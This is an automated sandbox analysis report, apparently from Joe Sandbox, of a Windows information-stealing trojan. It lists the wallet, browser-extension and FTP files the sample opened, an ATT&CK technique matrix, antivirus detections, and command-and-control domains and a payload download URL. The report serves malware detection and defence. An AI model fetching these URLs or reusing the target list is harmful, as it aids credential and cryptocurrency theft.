        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeDirectory queried: number of queries: 1001
        Source: Yara matchFile source: 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 67E6.tmp.exe PID: 7076, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 67E6.tmp.exe PID: 7076, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218BC
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BE6
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02141B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02141B23
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02140E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02140E4D
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        12
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        4
        Obfuscated Files or Information
        LSASS Memory21
        File and Directory Discovery
        Remote Desktop Protocol41
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)22
        Software Packing
        Security Account Manager44
        System Information Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS1
        Query Registry
        Distributed Component Object Model3
        Clipboard Data
        124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets31
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection
        DCSync1
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        DLKs2Qeljg.exe55%ReversingLabsWin32.Trojan.Generic
        DLKs2Qeljg.exe38%VirustotalBrowse
        DLKs2Qeljg.exe100%AviraHEUR/AGEN.1312582
        DLKs2Qeljg.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Temp\67E6.tmp.exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\67E6.tmp.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://skidjazzyric.click/api100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exeH0%Avira URL Cloudsafe
        http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE0%Avira URL Cloudsafe
        https://skidjazzyric.click/100%Avira URL Cloudmalware
        https://post-to-me.com/track_prt.php?sub=100%Avira URL Cloudmalware
        https://post-to-me.com/track_prt.php?sub=0&cc=DE4100%Avira URL Cloudmalware
        skidjazzyric.click100%Avira URL Cloudmalware
        https://skidjazzyric.click/apiO100%Avira URL Cloudmalware
        https://post-to-me.com/track_prt.php?sub=0&cc=DE100%Avira URL Cloudmalware
        https://post-to-me.com/100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exe:0%Avira URL Cloudsafe
        https://skidjazzyric.click:443/api100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        post-to-me.com
        104.21.56.70
        truefalse
          high
          skidjazzyric.click
          104.21.48.1
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            robinsharez.shopfalse
              high
              versersleep.shopfalse
                high
                https://skidjazzyric.click/apitrue
                • Avira URL Cloud: malware
                unknown
                soundtappysk.shopfalse
                  high
                  crowdwarek.shopfalse
                    high
                    skidjazzyric.clicktrue
                    • Avira URL Cloud: malware
                    unknown
                    apporholis.shopfalse
                      high
                      handscreamny.shopfalse
                        high
                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                        • Avira URL Cloud: malware
                        unknown
                        chipdonkeruz.shopfalse
                          high
                          femalsabler.shopfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://post-to-me.com/track_prt.php?sub=&cc=DEDLKs2Qeljg.exe, 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtab67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://post-to-me.com/track_prt.php?sub=0&cc=DE4DLKs2Qeljg.exe, 00000000.00000003.4010693772.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010822804.000000000060A000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000002.4149199546.000000000060B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://skidjazzyric.click/67E6.tmp.exe, 00000001.00000003.1778438197.000000000076A000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778490432.0000000000789000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000002.1946451731.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778438197.0000000000774000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778364316.0000000000768000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1819130013.0000000002E28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.rootca1.amazontrust.com/rootca1.crl067E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://upx.sf.netAmcache.hve.4.drfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://ocsp.rootca1.amazontrust.com0:67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201667E6.tmp.exe, 00000001.00000003.1779888049.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1791004004.0000000002E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1767E6.tmp.exe, 00000001.00000003.1779888049.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1791004004.0000000002E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://176.113.115.19/ScreenUpdateSync.exeDLKs2Qeljg.exe, DLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000002.4149154646.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://176.113.115.19/ScreenUpdateSync.exeHDLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://post-to-me.com/track_prt.php?sub=DLKs2Qeljg.exefalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWAREDLKs2Qeljg.exe, 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crl.micro67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778490432.0000000000789000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778438197.0000000000774000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://skidjazzyric.click/apiO67E6.tmp.exe, 00000001.00000003.1805495947.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://x1.c.lencr.org/067E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/067E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.microsof67E6.tmp.exe, 00000001.00000003.1779888049.0000000002E7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://post-to-me.com/DLKs2Qeljg.exe, 00000000.00000002.4149199546.000000000060B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://176.113.115.19/ScreenUpdateSync.exe:DLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://skidjazzyric.click:443/api67E6.tmp.exe, 00000001.00000003.1791704474.0000000002E2E000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1793311662.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1794561830.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1791170219.0000000002E2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.mozilla.org/products/firefoxgro.all67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.48.1
                                                                              skidjazzyric.clickUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              104.21.56.70
                                                                              post-to-me.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              176.113.115.19
                                                                              unknownRussian Federation
                                                                              49505SELECTELRUfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1586502
                                                                              Start date and time:2025-01-09 08:33:14 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 8m 41s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:9
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:DLKs2Qeljg.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:7b98863009146a47f1100922be254455.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/7@2/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 92%
                                                                              • Number of executed functions: 43
